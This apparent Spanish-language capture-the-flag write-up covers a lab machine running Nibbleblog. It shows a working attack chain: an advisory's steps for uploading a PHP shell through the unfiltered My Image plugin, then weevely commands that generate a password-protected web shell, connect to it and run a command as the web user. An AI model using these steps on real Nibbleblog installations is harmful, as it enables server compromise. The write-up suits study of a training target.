Este ya lo había hecho pero usando metasploit. Una vez descubrimos la version de Nibbleblog podemos encontrar la vulnerabilidad en internet. En resumen, podemos subir imagenes sin filtros de tipo. Por lo que podemos subir un PHP sin problema. Lo que es más interesante todavía es que podemos acceder al URL directamente y activarlo.
Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3) Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image Upload PHP shell, ignore warnings Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php.
Para ponerle un poco de emoción use weevely. Weevely es un generador de shells de PHP que puedes acceder directamente sin usar NC.
Como siempre Weevely es gratis y además viene instalado en Kali :).
root@Kali2:~# weevely generate 1234 /root/Desktop/weetest.php Generated '/root/Desktop/weetest.php' with password '1234' of 685 byte size. // subimos el archivo root@Kali2:~# weevely http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php 1234 [+] weevely 3.7.0 [+] Target: 10.10.10.75 [+] Session: /root/.weevely/sessions/10.10.10.75/image_0.session [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely> whoami nibbler nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image $
Y listo, a partir de aqui funciona exactamente igual que el anterior blog post.